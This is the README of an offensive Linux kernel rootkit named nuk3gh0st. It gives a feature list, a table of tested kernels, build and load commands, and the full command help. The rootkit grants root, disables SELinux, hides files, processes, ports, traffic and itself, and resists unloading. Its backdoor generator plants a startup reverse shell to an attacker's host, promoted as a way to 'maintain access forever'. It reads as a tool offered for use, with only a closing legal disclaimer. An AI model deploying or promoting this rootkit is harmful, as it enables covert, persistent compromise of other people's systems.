Universal Linux LKM rootkit, designed to work in any kernel version and both architectures (x86 and x64).
Please be aware of existing issues following the addition of the network traffic hiding functionality. Additionally, there is instability in multicore systems.
- Is the most stable Linux LKM rootkit, working in any kernel version from 2.6.32 to 4.17.9.
- Tested on 17 different distros with different kernel versions.
- Can enable rootkit at startup, supporting sysv-init, upstart and systemd.
- Includes backdoor generator, wich runs at system startup and is hidden by nuk3gh0st rootkit (files, process and traffic).
- Temporaly disables SELINUX if it is present, to load rootkit and enable it at startup withouth problems.
- Can hide files, processes, ports TCP and UDP of IPv4 and IPv6, and even TCP incoming and outgoing traffic.
- Hides itself from be watched trough lsmod, and hides their own files during rootkit loading.
- Easy to use, easy to build and compiles cleanly withouth any warning.
The rootkit can do the following:
- Grant root privileges to a userland process
- Hide process by PID
- Unhide a previously hidden process by PID
- Hide files or directories by their name
- Unhide previously hidden files or directories
- Hide TCP ports (for IPv4 and IPv6)
- Unhide previously hidden TCP ports
- Hide UDP ports (for IPv4 and IPv6)
- Unhide previously hidden UDP ports
- Hide incoming or outgoing TCP traffic by ip address
- Unhide previously hidden TCP traffic by ip address
- Hide itself
- Unhide itself
- Protect against being unloaded by the user
- Disable the unload protection
| Distro | Kernel | Arch |
|---|---|---|
| Arch Linux 2018 | 4.17.10-1-ARCH | x86_64 |
| Kali Linux (Rolling) | 4.17.9 | x86_64 |
| Kali Linux (Rolling) | 4.16.18 | x86_64 |
| Linux Mint 19 (Tara) | 4.15.0-20-generic | i686 |
| Kali Linux (Rolling) | 4.14.0-kali3-amd64 | x86_64 |
| Ubuntu 16.04.4 LTS | 4.13.0-36-generic | x86_64 |
| Fedora 26 | 4.11.8-300.fc26 | x86_64 |
| Ubuntu 17.04 | 4.10.0-19-generic | x86_64 |
| Debian 9 | 4.9.0-7-686 | i686 |
| Kali Linux (Rolling) | 4.4.142 | x86_64 |
| Kali Linux (Rolling) | 3.16.57 | x86_64 |
| Linux Mint 17 | 3.13.0-37-generic | x86_64 |
| Wifislax | 3.12.36 | i686 |
| Fedora 19 | 3.9.5-301.fc19 | x86_64 |
| Ubuntu 12.10 | 3.5.0-17-generic | i686 |
| Lihuen 5.10 (Debian based) | 3.2.0-4-amd64 | x86_64 |
| Ubuntu 10.04.4 LTS | 2.6.32-38-generic-pae | i686 |
Install a compiler, Linux headers and all other things required for us to build the rootkit:
apt-get update
apt-get install linux-headers-$(uname -r)
apt-get install build-essentialyum update
yum install linux-headers-$(uname -r)
yum install build-essentialmake
make installLoad rootkit:
load-nuk3gh0stUse rootkit:
nuk3gh0st --help
$$ $$ $$ $$$$$$
$$$ $$ $$ $$ $$ $$
$$$$ $$ $$ $$ $$ $$ $$
$$ $$ $$ $$ $$ $$ $$ $$$$$
$$ $$$$ $$ $$ $$$$$$ $$
$$ $$$ $$ $$ $$ $$ $$ $$
$$ $$ $$$$$$ $$ $$ $$$$$$
$$$$$$ $$ $$$$$$ $$
$$ $$ $$ $$$ $$ $$
$$ $$$$$$$ $$$$ $$ $$$$$$$ $$$$$$
$$ $$$$ $$ $$ $$ $$ $$ $$ $$
$$ $$ $$ $$ $$ $$$$ $$$$$$ $$
$$ $$ $$ $$ $$ $$$ $$ $$ $$
$$$$$$ $$ $$ $$$$$$ $$$$$$$ $$$$
By Juan Schällibaum
Based on nurupo rootkit
Usage: nuk3gh0st [OPTION]...
Options:
--root-shell Grants you root shell access.
--hide-pid=PID Hides the specified PID.
--unhide-pid=PID Unhides the specified PID.
--hide-file=FILENAME Hides the specified FILENAME globally.
Must be a filename without any path.
--unhide-file=FILENAME Unhides the specified FILENAME.
--hide-tcp-port=PORT Hides the specified tcp PORT.
--unhide-tcp-port=PORT Unhides the specified tcp PORT.
--hide-tcp6-port=PORT Hides the specified tcp6 PORT.
--unhide-tcp6-port=PORT Unhides the specified tcp6 PORT.
--hide-udp-port=PORT Hides the specified udp PORT.
--unhide-udp-port=PORT Unhides the specified udp PORT.
--hide-udp6-port=PORT Hides the specified udp6 PORT.
--unhide-udp6-port=PORT Unhides the specified udp6 PORT.
--hide-tcp-packet=IP Hides tcp4 packets incoming or outgoing from IP.
--unhide-tcp-packet=IP Unhides tcp4 packets incoming or outgoing from IP.
--hide Hides the rootkit LKM.
--unhide Unhides the rootkit LKM.
--help Print this help message.
--protect Protects the rootkit from rmmod.
--unprotect Disables the rmmod protection.Unload rootkit:
unload-nuk3gh0stEnabling rootkit at system startup:
enable-nuk3gh0stDisabling rootkit at system startup:
disable-nuk3gh0stUse backdoor generator:
backdoor-generator --help
\______ \_____ ____ | | __ __| _/____ ___________
| | _/\__ \ _/ ___\| |/ // __ |/ _ \ / _ \_ __ \
| | \ / __ \ \___| </ /_/ ( <_> | <_> ) | \/
|______ /(____ /\___ >__|_ \____ |\____/ \____/|__|
\/ \/ \/ \/ \/
__
____ ____ ____ ________________ _/ |_ ___________
/ ___\_/ __ \ / \_/ __ \_ __ \__ \ __\/ _ \_ __ \
/ /_/ > ___/| | \ ___/| | \// __ \| | ( <_> ) | \/
\___ / \___ >___| /\___ >__| (____ /__| \____/|__|
/_____/ \/ \/ \/ \/
Generates a backdoor that sends bash reverse TCP shell
every S seconds to H host, listening on P port
and running it on startup, hidding itself
with Nuk3gh0st LKM rootkit
In other words...
YOU CAN MANTAIN ACCESS FOR EVER AND EVER!
Usage:
backdoor-generator --host H --port P --sleep S
Genetares a backdoor that sends bash reverse TCP shell
every S seconds to H host listening on P port, and
running it on startup.
backdoor-generator --remove
Remove previously generated backdoor from startup
and their files.
backdoor-generator --help
Show this menu. make uninstallThis project is licensed under GPLv2.
Nuk3gh0st is based on nurupo/rootkit. It extends its functionality by incorporating both its own modules and those from other well-known rootkits. Additionally, it has been adapted to operate on a wide range of different kernels, undergoing thorough testing across various operating systems. However, it's important to note that the core of Nuk3gh0st is derived from nurupo's rootkit, and as such, nurupo deserves the majority of the credit.
Usage of nuk3gh0st for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program.